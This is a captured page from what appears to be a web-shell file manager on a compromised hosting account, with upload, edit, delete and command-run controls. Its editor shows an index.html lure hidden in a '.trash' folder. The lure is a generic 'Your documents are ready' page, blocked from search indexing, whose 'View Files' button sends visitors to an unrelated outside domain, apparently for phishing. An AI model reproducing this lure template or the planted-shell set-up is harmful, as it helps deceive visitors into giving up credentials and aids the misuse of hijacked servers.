/
home
/
oxcpoxcp
/
.trash
/
/home/oxcpoxcp/.trash
mkdir
upload
Name
Size
Mode
Actions
.trash_restore
114
0600
edit
dl
rm
index.html
6342
0644
edit
dl
rm
index.html.1
6716
0644
edit
dl
rm
Edit:
/home/oxcpoxcp/.trash/index.html
(6342B)
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet"> <meta name="googlebot" content="noindex, nofollow"> <title>Your Files</title> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; width: 100%; min-height: 100%; } body { background: #f1f5f9; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; color: #0f172a; line-height: 1.5; padding: 32px 16px; } .wrapper { width: 100%; max-width: 620px; margin: 0 auto; } .card { background: #ffffff; border: 1px solid #e2e8f0; border-radius: 18px; overflow: hidden; box-shadow: 0 10px 30px rgba(15, 23, 42, 0.08), 0 2px 6px rgba(15, 23, 42, 0.04); } /* Header */ .header { background: linear-gradient(135deg, #1d4ed8, #2563eb); padding: 34px 28px; text-align: center; color: #ffffff; } .logo { width: 54px; height: 54px; margin: 0 auto 14px; background: rgba(255, 255, 255, 0.16); border: 1px solid rgba(255, 255, 255, 0.25); border-radius: 14px; display: flex; align-items: center; justify-content: center; font-size: 25px; } .header-title { margin: 0; font-size: 25px; font-weight: 700; letter-spacing: -0.4px; } .header-subtitle { margin: 6px 0 0; font-size: 14px; color: rgba(255, 255, 255, 0.82); } /* Content */ .content { padding: 42px 34px 36px; text-align: center; } .document-icon { width: 72px; height: 72px; margin: 0 auto 22px; display: flex; align-items: center; justify-content: center; background: #eff6ff; border: 1px solid #dbeafe; border-radius: 18px; color: #2563eb; font-size: 32px; } h1 { margin: 0 0 12px; font-size: 24px; line-height: 1.25; font-weight: 700; letter-spacing: -0.4px; color: #111827; } .description { max-width: 440px; margin: 0 auto 28px; font-size: 15px; color: #64748b; } /* File information */ .file-box { max-width: 470px; margin: 0 auto 28px; padding: 16px 18px; display: flex; align-items: center; gap: 13px; text-align: left; background: #f8fafc; border: 1px solid #e2e8f0; border-radius: 12px; } .file-icon { flex-shrink: 0; width: 42px; height: 42px; display: flex; align-items: center; justify-content: center; background: #ffffff; border: 1px solid #e2e8f0; border-radius: 10px; font-size: 20px; } .file-text { min-width: 0; } .file-title { margin: 0; font-size: 14px; font-weight: 600; color: #1e293b; } .file-status { margin: 3px 0 0; font-size: 12px; color: #64748b; } /* Button */ .button-wrapper { margin-top: 4px; } .button { display: inline-block; padding: 14px 30px; background: #2563eb; color: #ffffff !important; border-radius: 10px; font-size: 15px; font-weight: 600; text-decoration: none; box-shadow: 0 5px 12px rgba(37, 99, 235, 0.22); transition: background 0.2s ease, transform 0.2s ease, box-shadow 0.2s ease; } .button:hover { background: #1d4ed8; box-shadow: 0 7px 16px rgba(37, 99, 235, 0.28); transform: translateY(-1px); } .button:active { transform: translateY(0); } /* Footer */ .footer { padding: 20px 28px 24px; text-align: center; border-top: 1px solid #eef2f7; background: #ffffff; } .footer p { margin: 0; font-size: 12px; color: #94a3b8; } /* Mobile */ @media (max-width: 480px) { body { padding: 18px 12px; } .header { padding: 30px 20px; } .content { padding: 34px 20px 30px; } .header-title { font-size: 22px; } h1 { font-size: 22px; } .button { display: block; width: 100%; padding: 14px 20px; } } </style> </head> <body> <div class="wrapper"> ``` <div class="card"> <!-- Header --> <div class="header"> <div class="logo"> 📁 </div> <h2 class="header-title"> Your Files </h2> <p class="header-subtitle"> Secure document access </p> </div> <!-- Main content --> <div class="content"> <div class="document-icon"> 📄 </div> <h1> Your documents are ready </h1> <p class="description"> Your documents are available to view. Click the button below to access your files. </p> <div class="file-box"> <div class="file-icon"> 📑 </div> <div class="file-text"> <p class="file-title"> Documents </p> <p class="file-status"> Files available for viewing </p> </div> </div> <div class="button-wrapper"> <!-- Replace this URL with your destination --> <a class="button" href="https://betterpetuc.drmover.com/c" target="_blank" rel="noopener noreferrer" > View Files → </a> </div> </div> <!-- Footer --> <div class="footer"> <p> Please use the button above to access your documents. </p> </div> </div> ``` </div> </body> </html>
Save
cmd:
run